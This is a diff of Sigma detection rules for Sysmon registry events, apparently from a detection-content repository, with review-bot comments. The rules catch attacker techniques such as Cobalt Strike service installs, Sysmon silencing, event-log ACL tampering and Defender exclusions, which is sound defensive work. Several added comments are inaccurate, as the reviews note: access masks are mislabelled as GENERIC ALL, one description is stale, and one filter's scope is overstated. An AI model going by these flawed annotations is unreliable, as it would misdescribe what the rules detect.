@@ -1,15 +1,10 @@ title: Changing RDP Port to Non Standard Number id: 509e84b9-a71a-40e0-834f-05470369bd1e status: test -description: 'Remote desktop is a common feature in operating systems. - - It allows a user to log into an interactive session with a system desktop graphical - user interface on a remote system. - - Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as - Remote Desktop Services (RDS). - - ' +description: | + Remote desktop is a common feature in operating systems. + It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. + Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml b/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml index e9063aeb6..0220304a8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml @@ -1,8 +1,8 @@ title: IE Change Domain Zone id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 related: - - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 - type: derived + - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 + type: derived status: experimental description: Hides the file extension through modification of the registry references: 
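Review bot: The description kept on the new side of the IE Change Domain Zone hunk, `description: Hides the file extension through modification of the registry`, does not describe this rule; the selection (in the next hunk) matches writes under `...\Internet Settings\ZoneMap\Domains\`, which is about assigning a domain to an Internet Explorer security zone. While the metadata is being reflowed here, suggest something like `description: Detects changes to the Internet Settings ZoneMap\Domains registry keys, which assign a domain to an Internet Explorer security zone and can be used to loosen restrictions for a chosen domain`. The stale text may have been carried over from the related rule `d88d0ab2-...`, but that rule is not in view, so this is only a guess.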
@@ -23,12 +23,11 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_domains: - TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet - Settings\ZoneMap\Domains\ + TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ filter: Details: - - DWORD (0x00000000) - - DWORD (0x00000001) + - DWORD (0x00000000) # My Computer + - DWORD (0x00000001) # Local Intranet Zone - (Empty) condition: registry_set and (selection_domains and not filter) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml b/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml index 7ce5242ad..89686562d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml @@ -1,9 +1,7 @@ title: Disable Sysmon Event Logging Via Registry id: 4916a35e-bfc4-47d0-8e25-a003d7067061 status: experimental -description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured - to load at an altitude of another registered service, it will fail to load at - boot. +description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. references: - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650 - https://youtu.be/zSihR3lTf7g diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml index 927831482..3f53d0dc5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml 
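Review bot: The added `# My Computer` and `# Local Intranet Zone` comments label the two excluded values but leave the reader to work out what the rule still fires on. Since `filter` only drops `0x0`, `0x1` and `(Empty)`, a one-line comment above `filter:` such as `# Zone values 2 (Trusted Sites), 3 (Internet) and 4 (Restricted Sites) are not filtered and are alerted on` would make the intent explicit. In IE terminology `0x0` is the Local Machine zone, so `# My Computer (Local Machine zone)` would be the more precise label.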
@@ -1,8 +1,7 @@ title: Change Winevt Event Access Permission Via Registry id: 7d9263bd-dc47-4a58-bc92-5474abab390c status: experimental -description: Detects tampering with the "ChannelAccess" registry key in order to change - access to Windows event channel +description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel references: - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ @@ -24,10 +23,11 @@ detection: selection: TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\ TargetObject|endswith: \ChannelAccess + # Add more interesting combinations if you found them Details|contains: - - (A;;0x1;;;SY) - - (A;;0x5;;;BA) - - (A;;0x1;;;LA) + - (A;;0x1;;;SY) # Local System having GENERIC ALL + - (A;;0x5;;;BA) # Built-in administrators having GENERIC ALL and GENERIC WRITE + - (A;;0x1;;;LA) # Local administrator having GENERIC ALL filter_trustedinstaller: Image: C:\Windows\servicing\TrustedInstaller.exe filter_ti_worker: diff --git a/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml index ba21d52b5..e055aed4b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml 
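Review bot: The comments added to the `Details|contains` ACE strings describe `0x1` as GENERIC ALL and `0x5` as GENERIC ALL plus GENERIC WRITE, which does not match how the access mask of an event log channel is read: the low bits are the log-specific rights (0x1 read, 0x2 write, 0x4 clear), and generic rights would be spelled `GA`/`GW` in SDDL. As I read it the rule catches a descriptor that leaves SYSTEM read-only, Builtin Administrators read+clear and the local Administrator account read-only, so the comments should say that, e.g. `(A;;0x1;;;SY) # SYSTEM: read only`, `(A;;0x5;;;BA) # Builtin Administrators: read + clear`, `(A;;0x1;;;LA) # local Administrator account: read only`. The new `# Add more interesting combinations if you found them` line would be more useful if it also named what makes these interesting (presumably the missing write right that the default channel ACL grants), so future additions follow the same logic.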
@@ -23,112 +23,112 @@ detection: TargetObject|endswith: update_url chrome_vpn: TargetObject|contains: - - fdcgdnkidjaadafnichfpabhfomcebme - - fcfhplploccackoneaefokcmbjfbkenj - - bihmplhobchoageeokmgbdihknkjbknd - - gkojfkhlekighikafcpjkiklfbnlmeio - - jajilbjjinjmgcibalaakngmkilboobh - - gjknjjomckknofjidppipffbpoekiipm - - nabbmpekekjknlbkgpodfndbodhijjem - - kpiecbcckbofpmkkkdibbllpinceiihk - - nlbejmccbhkncgokjcmghpfloaajcffj - - omghfjlpggmjjaagoclmmobgdodcjboh - - bibjcjfmgapbfoljiojpipaooddpkpai - - mpcaainmfjjigeicjnlkdfajbioopjko - - jljopmgdobloagejpohpldgkiellmfnc - - lochiccbgeohimldjooaakjllnafhaid - - nhnfcgpcbfclhfafjlooihdfghaeinfc - - ookhnhpkphagefgdiemllfajmkdkcaim - - namfblliamklmeodpcelkokjbffgmeoo - - nbcojefnccbanplpoffopkoepjmhgdgh - - majdfhpaihoncoakbjgbdhglocklcgno - - lnfdmdhmfbimhhpaeocncdlhiodoblbd - - eppiocemhmnlbhjplcgkofciiegomcon - - cocfojppfigjeefejbpfmedgjbpchcng - - foiopecknacmiihiocgdjgbjokkpkohc - - hhdobjgopfphlmjbmnpglhfcgppchgje - - jgbaghohigdbgbolncodkdlpenhcmcge - - inligpkjkhbpifecbdjhmdpcfhnlelja - - higioemojdadgdbhbbbkfbebbdlfjbip - - hipncndjamdcmphkgngojegjblibadbe - - iolonopooapdagdemdoaihahlfkncfgg - - nhfjkakglbnnpkpldhjmpmmfefifedcj - - jpgljfpmoofbmlieejglhonfofmahini - - fgddmllnllkalaagkghckoinaemmogpe - - ejkaocphofnobjdedneohbbiilggdlbi - - keodbianoliadkoelloecbhllnpiocoi - - hoapmlpnmpaehilehggglehfdlnoegck - - poeojclicodamonabcabmapamjkkmnnk - - dfkdflfgjdajbhocmfjolpjbebdkcjog - - kcdahmgmaagjhocpipbodaokikjkampi - - klnkiajpmpkkkgpgbogmcgfjhdoljacg - - lneaocagcijjdpkcabeanfpdbmapcjjg - - pgfpignfckbloagkfnamnolkeaecfgfh - - jplnlifepflhkbkgonidnobkakhmpnmh - - jliodmnojccaloajphkingdnpljdhdok - - hnmpcagpplmpfojmgmnngilcnanddlhb - - ffbkglfijbcbgblgflchnbphjdllaogb - - kcndmbbelllkmioekdagahekgimemejo - - jdgilggpfmjpbodmhndmhojklgfdlhob - - bihhflimonbpcfagfadcnbbdngpopnjb - - ppajinakbfocjfnijggfndbdmjggcmde - - oofgbpoabipfcfjapgnbbjjaenockbdp - - bhnhkdgoefpmekcgnccpnhjfdgicfebm - - 
knmmpciebaoojcpjjoeonlcjacjopcpf - - dhadilbmmjiooceioladdphemaliiobo - - jedieiamjmoflcknjdjhpieklepfglin - - mhngpdlhojliikfknhfaglpnddniijfh - - omdakjcmkglenbhjadbccaookpfjihpa - - npgimkapccfidfkfoklhpkgmhgfejhbj - - akeehkgglkmpapdnanoochpfmeghfdln - - gbmdmipapolaohpinhblmcnpmmlgfgje - - aigmfoeogfnljhnofglledbhhfegannp - - cgojmfochfikphincbhokimmmjenhhgk - - ficajfeojakddincjafebjmfiefcmanc - - ifnaibldjfdmaipaddffmgcmekjhiloa - - jbnmpdkcfkochpanomnkhnafobppmccn - - apcfdffemoinopelidncddjbhkiblecc - - mjolnodfokkkaichkcjipfgblbfgojpa - - oifjbnnafapeiknapihcmpeodaeblbkn - - plpmggfglncceinmilojdkiijhmajkjh - - mjnbclmflcpookeapghfhapeffmpodij - - bblcccknbdbplgmdjnnikffefhdlobhp - - aojlhgbkmkahabcmcpifbolnoichfeep - - lcmammnjlbmlbcaniggmlejfjpjagiia - - knajdeaocbpmfghhmijicidfcmdgbdpm - - bdlcnpceagnkjnjlbbbcepohejbheilk - - edknjdjielmpdlnllkdmaghlbpnmjmgb - - eidnihaadmmancegllknfbliaijfmkgo - - ckiahbcmlmkpfiijecbpflfahoimklke - - macdlemfnignjhclfcfichcdhiomgjjb - - chioafkonnhbpajpengbalkececleldf - - amnoibeflfphhplmckdbiajkjaoomgnj - - llbhddikeonkpbhpncnhialfbpnilcnc - - pcienlhnoficegnepejpfiklggkioccm - - iocnglnmfkgfedpcemdflhkchokkfeii - - igahhbkcppaollcjeaaoapkijbnphfhb - - njpmifchgidinihmijhcfpbdmglecdlb - - ggackgngljinccllcmbgnpgpllcjepgc - - kchocjcihdgkoplngjemhpplmmloanja - - bnijmipndnicefcdbhgcjoognndbgkep - - lklekjodgannjcccdlbicoamibgbdnmi - - dbdbnchagbkhknegmhgikkleoogjcfge - - egblhcjfjmbjajhjhpmnlekffgaemgfh - - ehbhfpfdkmhcpaehaooegfdflljcnfec - - bkkgdjpomdnfemhhkalfkogckjdkcjkg - - almalgbpmcfpdaopimbdchdliminoign - - akkbkhnikoeojlhiiomohpdnkhbkhieh - - gbfgfbopcfokdpkdigfmoeaajfmpkbnh - - bniikohfmajhdcffljgfeiklcbgffppl - - lejgfmmlngaigdmmikblappdafcmkndb - - ffhhkmlgedgcliajaedapkdfigdobcif - - gcknhkkoolaabfmlnjonogaaifnjlfnp - - pooljnboifbodgifngpppfklhifechoe - - fjoaledfpmneenckfbpdfhkmimnjocfa - - aakchaleigkohafkfjfjbblobjifikek - - dpplabbmogkhghncfbfdeeokoefdjegm - - padekgcemlokbadohgkifijomclgjgif - - 
bfidboloedlamgdmenmlbipfnccokknp + - fdcgdnkidjaadafnichfpabhfomcebme # ZenMate VPN + - fcfhplploccackoneaefokcmbjfbkenj # 1clickVPN + - bihmplhobchoageeokmgbdihknkjbknd # Touch VPN + - gkojfkhlekighikafcpjkiklfbnlmeio # Hola Free VPN + - jajilbjjinjmgcibalaakngmkilboobh # Astar VPN + - gjknjjomckknofjidppipffbpoekiipm # VPN Free + - nabbmpekekjknlbkgpodfndbodhijjem # Earth VPN + - kpiecbcckbofpmkkkdibbllpinceiihk # DotVPN + - nlbejmccbhkncgokjcmghpfloaajcffj # Hotspot Shield Free VPN + - omghfjlpggmjjaagoclmmobgdodcjboh # Browsec VPN + - bibjcjfmgapbfoljiojpipaooddpkpai # VPN-free.pro + - mpcaainmfjjigeicjnlkdfajbioopjko # VPN Unlimited Free + - jljopmgdobloagejpohpldgkiellmfnc # PP VPN + - lochiccbgeohimldjooaakjllnafhaid # IP Unblock + - nhnfcgpcbfclhfafjlooihdfghaeinfc # Surf VPN + - ookhnhpkphagefgdiemllfajmkdkcaim # iNinja VPN + - namfblliamklmeodpcelkokjbffgmeoo # Daily VPN + - nbcojefnccbanplpoffopkoepjmhgdgh # Hoxx VPN Proxy + - majdfhpaihoncoakbjgbdhglocklcgno # Free VPN + - lnfdmdhmfbimhhpaeocncdlhiodoblbd # VPN PROXY MASTER + - eppiocemhmnlbhjplcgkofciiegomcon # Urban Free VPN + - cocfojppfigjeefejbpfmedgjbpchcng # SaferVPN Proxy + - foiopecknacmiihiocgdjgbjokkpkohc # VPN Professional + - hhdobjgopfphlmjbmnpglhfcgppchgje # AdGuard VPN + - jgbaghohigdbgbolncodkdlpenhcmcge # Free VPN + - inligpkjkhbpifecbdjhmdpcfhnlelja # Free One Touch VPN + - higioemojdadgdbhbbbkfbebbdlfjbip # Unlimited VPN & Proxy by ibVPN + - hipncndjamdcmphkgngojegjblibadbe # RusVPN + - iolonopooapdagdemdoaihahlfkncfgg # Azino VPN + - nhfjkakglbnnpkpldhjmpmmfefifedcj # Pron VPN + - jpgljfpmoofbmlieejglhonfofmahini # Free Residential VPN + - fgddmllnllkalaagkghckoinaemmogpe # ExpressVPN + - ejkaocphofnobjdedneohbbiilggdlbi # Hotspot Shield Elite VPN Proxy + - keodbianoliadkoelloecbhllnpiocoi # Hide My IP VPN + - hoapmlpnmpaehilehggglehfdlnoegck # Tunnello VPN + - poeojclicodamonabcabmapamjkkmnnk # HMA VPN Proxy Unblocker + - dfkdflfgjdajbhocmfjolpjbebdkcjog # Free Avira Phantom VPN + 
- kcdahmgmaagjhocpipbodaokikjkampi # Hola VPN + - klnkiajpmpkkkgpgbogmcgfjhdoljacg # Free VPN for Chrome + - lneaocagcijjdpkcabeanfpdbmapcjjg # Hub VPN + - pgfpignfckbloagkfnamnolkeaecfgfh # Free Proxy VPN + - jplnlifepflhkbkgonidnobkakhmpnmh # Private Internet Access + - jliodmnojccaloajphkingdnpljdhdok # Turbo VPN for PC + - hnmpcagpplmpfojmgmnngilcnanddlhb # Windscribe + - ffbkglfijbcbgblgflchnbphjdllaogb # CyberGhost VPN + - kcndmbbelllkmioekdagahekgimemejo # VPN.AC + - jdgilggpfmjpbodmhndmhojklgfdlhob # Browser VPN + - bihhflimonbpcfagfadcnbbdngpopnjb # DEEPRISM VPN + - ppajinakbfocjfnijggfndbdmjggcmde # My Browser Vpn + - oofgbpoabipfcfjapgnbbjjaenockbdp # SetupVPN + - bhnhkdgoefpmekcgnccpnhjfdgicfebm # Wachee VPN + - knmmpciebaoojcpjjoeonlcjacjopcpf # Thunder Proxy + - dhadilbmmjiooceioladdphemaliiobo # Free Proxy VPN + - jedieiamjmoflcknjdjhpieklepfglin # FastestVPN Proxy + - mhngpdlhojliikfknhfaglpnddniijfh # WorkingVPN + - omdakjcmkglenbhjadbccaookpfjihpa # TunnelBear VPN + - npgimkapccfidfkfoklhpkgmhgfejhbj # BelkaVPN + - akeehkgglkmpapdnanoochpfmeghfdln # VPN Master + - gbmdmipapolaohpinhblmcnpmmlgfgje # Unblock Websites + - aigmfoeogfnljhnofglledbhhfegannp # Lethean Proxy VPN + - cgojmfochfikphincbhokimmmjenhhgk # Whoer VPN + - ficajfeojakddincjafebjmfiefcmanc # Best VPN USA + - ifnaibldjfdmaipaddffmgcmekjhiloa # FREE VPN DEWELOPMENT + - jbnmpdkcfkochpanomnkhnafobppmccn # apkfold free vpn + - apcfdffemoinopelidncddjbhkiblecc # Soul VPN + - mjolnodfokkkaichkcjipfgblbfgojpa # DotVPN + - oifjbnnafapeiknapihcmpeodaeblbkn # rderzh VPN Proxy + - plpmggfglncceinmilojdkiijhmajkjh # Red Panda VPN + - mjnbclmflcpookeapghfhapeffmpodij # Ultrareach VPN + - bblcccknbdbplgmdjnnikffefhdlobhp # FastStunnel VPN + - aojlhgbkmkahabcmcpifbolnoichfeep # VirtualShield VPN + - lcmammnjlbmlbcaniggmlejfjpjagiia # Adblock Office VPN Proxy Server + - knajdeaocbpmfghhmijicidfcmdgbdpm # Guru VPN & Proxy + - bdlcnpceagnkjnjlbbbcepohejbheilk # Malus VPN + - 
edknjdjielmpdlnllkdmaghlbpnmjmgb # Muscle VPN + - eidnihaadmmancegllknfbliaijfmkgo # Push VPN + - ckiahbcmlmkpfiijecbpflfahoimklke # Gom VPN + - macdlemfnignjhclfcfichcdhiomgjjb # Free Fast VPN + - chioafkonnhbpajpengbalkececleldf # BullVPN + - amnoibeflfphhplmckdbiajkjaoomgnj # HideAll VPN + - llbhddikeonkpbhpncnhialfbpnilcnc # ProxyFlow + - pcienlhnoficegnepejpfiklggkioccm # Cloud VPN + - iocnglnmfkgfedpcemdflhkchokkfeii # sVPN + - igahhbkcppaollcjeaaoapkijbnphfhb # Social VPN + - njpmifchgidinihmijhcfpbdmglecdlb # Trellonet Trellonet + - ggackgngljinccllcmbgnpgpllcjepgc # WindmillVPN + - kchocjcihdgkoplngjemhpplmmloanja # IPBurger Proxy & VPN + - bnijmipndnicefcdbhgcjoognndbgkep # Veee + - lklekjodgannjcccdlbicoamibgbdnmi # Anonymous Proxy Vpn Browser + - dbdbnchagbkhknegmhgikkleoogjcfge # Hideman VPN + - egblhcjfjmbjajhjhpmnlekffgaemgfh # Fornex VPN + - ehbhfpfdkmhcpaehaooegfdflljcnfec # WeVPN + - bkkgdjpomdnfemhhkalfkogckjdkcjkg # VPNMatic + - almalgbpmcfpdaopimbdchdliminoign # Urban Shield + - akkbkhnikoeojlhiiomohpdnkhbkhieh # Prime VPN + - gbfgfbopcfokdpkdigfmoeaajfmpkbnh # westwind + - bniikohfmajhdcffljgfeiklcbgffppl # Upnet + - lejgfmmlngaigdmmikblappdafcmkndb # uVPN + - ffhhkmlgedgcliajaedapkdfigdobcif # Nucleus VPN + - gcknhkkoolaabfmlnjonogaaifnjlfnp # FoxyProxy Standard + - pooljnboifbodgifngpppfklhifechoe # GeoProxy + - fjoaledfpmneenckfbpdfhkmimnjocfa # NordVPN + - aakchaleigkohafkfjfjbblobjifikek # ProxFlow + - dpplabbmogkhghncfbfdeeokoefdjegm # Proxy SwitchySharp + - padekgcemlokbadohgkifijomclgjgif # Proxy SwitchyOmega + - bfidboloedlamgdmenmlbipfnccokknp # PureVPN condition: registry_set and (all of chrome_*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml b/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml index 37c6fd5ce..9e25b3087 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml 
+++ b/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml @@ -1,8 +1,7 @@ title: ClickOnce Trust Prompt Tampering id: ac9159cc-c364-4304-8f0a-d63fc1a0aabb status: experimental -description: Detects changes to the ClickOnce trust prompt registry key in order to - enable an installation from different locations such as the Internet. +description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior diff --git a/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml b/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml index bb3c77777..ff53200a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml 
@@ -1,16 +1,10 @@ title: CobaltStrike Service Installations in Registry id: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 status: test -description: 'Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement. - +description: | + Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) - - In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services - or HKLM\System\ControlSet002\Services, however, this rule is based on a regular - sysmon''s events. - - ' + In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon's events. references: - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 author: Wojciech Lesicki diff --git a/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml index 98b63207b..45fa73ee8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml 
@@ -1,11 +1,10 @@ title: Service Binary in Suspicious Folder id: a07f0359-4c90-4dc4-a681-8ffea40b4f47 related: - - id: c0abc838-36b0-47c9-b3b3-a90c39455382 - type: obsoletes + - id: c0abc838-36b0-47c9-b3b3-a90c39455382 + type: obsoletes status: experimental -description: Detect the creation of a service with a service binary located in a suspicious - directory +description: Detect the creation of a service with a service binary located in a suspicious directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems), frack113 @@ -31,9 +30,10 @@ detection: - \ADMIN$\ - \Temp\ Details: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: TargetObject|startswith: HKLM\System\CurrentControlSet\Services\ TargetObject|endswith: \ImagePath @@ -43,7 +43,7 @@ detection: - \ADMIN$\ - \Temp\ filter_1: - Image|contains|all: + Image|contains|all: # Filter FP with Avast software - \Common Files\ - \Temp\ condition: registry_set and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml index bb3cbaa38..ea30f2357 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml 
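Review bot: The `# Filter FP with Avast software` comment on `filter_1` describes a narrower intent than the filter implements: `Image|contains|all` with `\Common Files\` and `\Temp\` excludes any service-creating image whose path contains both substrings, not just Avast. Either narrow the match to the Avast-specific path (the vendor component is not visible here, so I cannot propose the exact string) or reword the comment to state the real scope, e.g. `# Excludes any image under a *\Common Files\*\Temp\* path (observed FP: Avast); this is vendor-agnostic`. The enclosing `detection` block starts before this hunk.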
@@ -1,8 +1,7 @@ title: Service Binary in Uncommon Folder id: 277dc340-0540-42e7-8efb-5ff460045e07 status: experimental -description: Detect the creation of a service with a service binary located in a uncommon - directory +description: Detect the creation of a service with a service binary located in a uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems) @@ -26,9 +25,10 @@ detection: - \AppData\Local\ - \AppData\Roaming\ Details: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: TargetObject|startswith: HKLM\System\CurrentControlSet\Services\ TargetObject|endswith: \ImagePath @@ -36,12 +36,12 @@ detection: - \AppData\Local\ - \AppData\Roaming\ filter: - - Image|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom - - Details|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom + - Image|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom + - Details|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom condition: registry_set and (1 of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml index 1ff075dab..606eeaf53 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml 
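Review bot: The reflowed `description:` line keeps the grammatical slip `in a uncommon directory`; since the line is being rewritten anyway, make it `description: Detect the creation of a service with a service binary located in an uncommon directory`. The sibling rule in the previous file uses the same sentence with `suspicious`, so only the article needs to change here.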
@@ -1,8 +1,7 @@ title: Suspicious New Printer Ports in Registry (CVE-2020-1048) id: 7ec912f2-5175-4868-b811-ec13ad0f8567 status: test -description: Detects a new and suspicious printer port creation in Registry that could - be an attempt to exploit CVE-2020-1048 +description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048 references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth (Nextron Systems), NVISO diff --git a/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml b/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml index b29d1ca2a..fcb1facaa 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml @@ -1,8 +1,7 @@ title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) id: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3 status: test -description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could - be an attempt to exploit CVE-2022-30190. +description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml index e281c2189..4ce622fc0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml 
@@ -1,9 +1,7 @@ title: Potential Registry Persistence Attempt Via DbgManagedDebugger id: 9827ae57-3802-418f-994b-d5ecf5cd974b status: experimental -description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" - key in order to achieve persistence. Which will get invoked when an application - crashes +description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes references: - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - https://github.com/last-byte/PersistenceSniper @@ -24,11 +22,9 @@ detection: selection: TargetObject|endswith: \Microsoft\.NETFramework\DbgManagedDebugger filter: - Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT - "%s" EVTHDL %d' + Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml b/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml index fadb7bf05..4c3ce7431 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml @@ -1,8 +1,8 @@ title: Windows Defender Exclusions Added - Registry id: a982fc9c-6333-4ffb-a51d-addb04e8b529 related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: derived + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: derived status: test description: Detects the Setting of Windows Defender Exclusions references: 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml b/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml index 99eb77f20..6e0987021 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Via Registry id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae related: - - id: 8cbc9475-8d05-4e27-9c32-df960716c701 - type: similar + - id: 8cbc9475-8d05-4e27-9c32-df960716c701 + type: similar status: experimental -description: 'Detects regsitry value settings that would replace the user''s desktop - background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects regsitry value settings that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ 
